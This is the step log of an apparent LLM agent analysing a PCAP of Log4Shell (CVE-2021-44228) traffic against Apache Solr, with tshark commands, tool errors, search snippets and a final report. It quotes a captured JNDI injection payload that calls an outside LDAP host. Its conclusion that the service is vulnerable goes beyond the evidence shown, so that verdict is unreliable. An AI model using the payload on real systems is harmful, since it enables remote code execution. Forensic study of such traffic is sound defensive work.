[Task 6]
Step 1: Based on the TCP conversation summary, the communication is happening between two IP addresses on port 8983. This port is commonly associated with Apache Solr, a popular open-source search platform. However, to confirm the service or application involved, I need to analyze the packet data to identify any specific application signatures or protocol details.

Next, I will extract the application layer data from the PCAP file to confirm the service or application involved in the communication on port 8983.

Action: Use the "tshark_expert" to extract application layer data from the PCAP file to identify the service or application involved.
Step 2: Final report from the forensic expert:
The analysis focused on identifying the service or application involved in the communication on port 8983. Initial attempts to extract HTTP headers revealed a suspicious LDAP URL, suggesting a potential exploitation attempt using a JNDI injection vulnerability, possibly targeting Apache Solr. Further attempts to extract additional HTTP headers to confirm the application or service involved were unsuccessful due to an invalid field error. The field 'http.x_powered_by' was not valid, and no alternative field was found in the manual search. Therefore, the analysis concludes with the identification of a potential exploitation attempt targeting Apache Solr, but without additional application-specific headers.
Executed command: -Y "tcp.port == 8983 && http" -T fields -e http.host -e http.request.uri -e http.user_agent -e http.server -e http.x_powered_by

Command output: Error: Command '['tshark', '-r', 'C:\\Users\\Stefano\\OneDrive\\Desktop\\LLM_Agent_Cybersecurity_Forensic\\src\\data\\raw\\eventID_6\\CVE-2021-44228.pcap', '-Y', 'tcp.port == 8983 && http', '-T', 'fields', '-e', 'http.host', '-e', 'http.request.uri', '-e', 'http.user_agent', '-e', 'http.server', '-e', 'http.x_powered_by']' returned non-zero exit status 1.
tshark: Some fields aren't valid:
	http.x_powered_by

Step 3: Based on the previous analysis, there is a suspicion of a JNDI injection vulnerability targeting Apache Solr. This aligns with known vulnerabilities such as CVE-2021-44228, which is associated with the Log4j library and can be exploited via JNDI injection. To confirm this, I need to verify the presence of any specific patterns or payloads related to this CVE in the network traffic.

Next, I will perform a web search to gather more information about CVE-2021-44228 and its exploitation patterns to cross-reference with the evidence found in the PCAP file. 

Action: Use the web search tool to find detailed information about CVE-2021-44228, focusing on exploitation patterns and indicators of compromise.
Step 4: 
Step 5: Search result for query: 'CVE-2021-44228 exploitation patterns and indicators of compromise'
Information 1: OCs) The following indicators of compromise are associated with observed exploitation activity targeting CVE-2021-44228.New IOCs for Dec. 21, 2021 can be found here.New IOCs for Dec. 20, 2021 can be found here.New IOCs for Dec. 17, 2021 can be found here.New IOCs for Dec. 16, 2021 can be found here.Previously identified IOCs can be found here. Share this post Related Content ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices April 24, 2024 11:54 ArcaneDoor is a campaign th
Information 2: empted exploitation, and information on exploitation that we saw prior to the public disclosure of CVE-2021-44228.In short, we saw limited testing of the vulnerability on December 1, eight days before public disclosure. We saw the first attempt to exploit the vulnerability just nine minutes after public disclosure showing just how fast attackers exploit newly found problems.We also see mass attempts to evade WAFs that have tried to perform simple blocking, we see mass attempts to exfiltrate data including s
Information 3: ty can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections. Alerts with the following titles in the Security Center can indicate threat activity on your network: Possible Log4j exploitation Suspicious script launched 
Information 4: customers can use Global Threat Alerts to identify malicious activity associated with these vulnerabilities to detect ongoing vulnerability scans and malware installation attempts. For more information please click here and here.Indicators of Compromise (IOCs) The following indicators of compromise are associated with observed exploitation activity targeting CVE-2021-44228.New IOCs for Dec. 21, 2021 can be found here.New IOCs for Dec. 20, 2021 can be found here.New IOCs for Dec. 17, 2021 can be found here.N
Information 5: t are all trying to bypass string-matching detections. At the time of publication, the vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating 
Step 6: Based on the information gathered so far, there is a suspicion of a JNDI injection vulnerability targeting Apache Solr, potentially related to CVE-2021-44228. The web search provided insights into exploitation patterns and indicators of compromise associated with this CVE, such as coin mining, lateral movement, and Cobalt Strike usage.

To further investigate, I need to analyze the PCAP file for any signs of these post-exploitation activities or specific patterns related to CVE-2021-44228. This will help determine if the service is vulnerable and if the attack was successful.

Next, I will use the "tshark_expert" to search for signs of post-exploitation activities, such as suspicious script execution or data exfiltration attempts, in the PCAP file. 

Action: Use the "tshark_expert" to search for signs of post-exploitation activities in the PCAP file, focusing on suspicious script execution or data exfiltration attempts.
Step 7: 
Step 8: TsharkExpert analysis did not complete successfully.
Step 9: Based on the previous analysis, there is a suspicion of a JNDI injection vulnerability targeting Apache Solr, potentially related to CVE-2021-44228. The web search provided insights into exploitation patterns and indicators of compromise associated with this CVE, such as coin mining, lateral movement, and Cobalt Strike usage.

The last attempt to use the "tshark_expert" to search for signs of post-exploitation activities in the PCAP file did not complete successfully. To proceed, I need to refine the analysis approach to identify specific network behaviors or patterns that could indicate post-exploitation activities, such as unusual outbound connections or data transfers.

Next, I will attempt to identify any unusual outbound connections or data transfers in the PCAP file, which could indicate post-exploitation activities. 

Action: Use the "tshark_expert" to analyze the PCAP file for unusual outbound connections or data transfers, focusing on identifying any suspicious network behaviors.
Step 10: 
Step 11: Network error while processing
Step 12: The previous attempts to analyze the PCAP file for signs of post-exploitation activities, such as unusual outbound connections or data transfers, were unsuccessful due to network errors. To proceed, I need to refine the analysis approach and attempt to identify specific network behaviors or patterns that could indicate post-exploitation activities.

Next, I will attempt to identify any unusual outbound connections or data transfers in the PCAP file, which could indicate post-exploitation activities. 

Action: Use the "tshark_expert" to analyze the PCAP file for unusual outbound connections or data transfers, focusing on identifying any suspicious network behaviors.
Step 13: Final report from the forensic expert:
The analysis identified a suspicious HTTP GET request to a URL containing a potential LDAP injection attempt, indicating an attempt to exploit a vulnerability in the Solr service on port 8983. The HTTP request details, including the host, URI, and user agent, were extracted for further analysis.
Executed command: tshark -r <pcap_file> -Y "http.request" -T fields -e http.host -e http.request.uri -e http.user_agent

Command output: localhost:8983	/solr/admin/cores?action=$%7Bjndi:ldap://8qvsbr.sdasda1212.cn%7D	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

Step 14: 
Step 15: Stored memory d6008b29-ad35-4871-8b8f-d38c2cdd889f
Step 16: 
Step 17: Final report from the forensic expert:
The analysis of the PCAP file revealed a suspicious HTTP GET request containing an LDAP URL, which is indicative of the Log4Shell vulnerability (CVE-2021-44228). This vulnerability is often exploited for remote code execution and can be associated with Cobalt Strike post-exploitation activities. The HTTP request attempted to access a Solr admin core with a potentially malicious LDAP URL, but the server responded with a '400 Bad Request' error, indicating the operation was unsupported. Further investigation into DNS queries related to the LDAP URL was attempted, but an error in the filter syntax prevented successful execution. The error was due to the filter string being too long to be a valid character constant, and a correction was not found within the constraints of the task.
Executed command: tshark -Y "dns.qry.name contains '8qvsbr.sdasda1212.cn'" -T fields -e frame.number -e ip.src -e ip.dst -e dns.qry.name -e dns.flags.response -e dns.a -e dns.aaaa

Command output: The error encountered indicates that the filter string '8qvsbr.sdasda1212.cn' is too long to be a valid character constant in the display filter. This suggests that the filter syntax needs to be adjusted to properly handle the string.

Step 18: 
Step 19: FINAL REPORT:
The analysis of the PCAP file revealed a suspicious HTTP GET request containing an LDAP URL, indicative of the Log4Shell vulnerability (CVE-2021-44228). This vulnerability is often exploited for remote code execution and can be associated with Cobalt Strike post-exploitation activities. The HTTP request attempted to access a Solr admin core with a potentially malicious LDAP URL, but the server responded with a '400 Bad Request' error, indicating the operation was unsupported. Further investigation into DNS queries related to the LDAP URL was attempted, but an error in the filter syntax prevented successful execution. The error was due to the filter string being too long to be a valid character constant, and a correction was not found within the constraints of the task.
REPORT SUMMARY:
Identified CVE: CVE-2021-44228
Affected Service: Apache Solr
Is Service Vulnerable: True
Attack succeeded: False

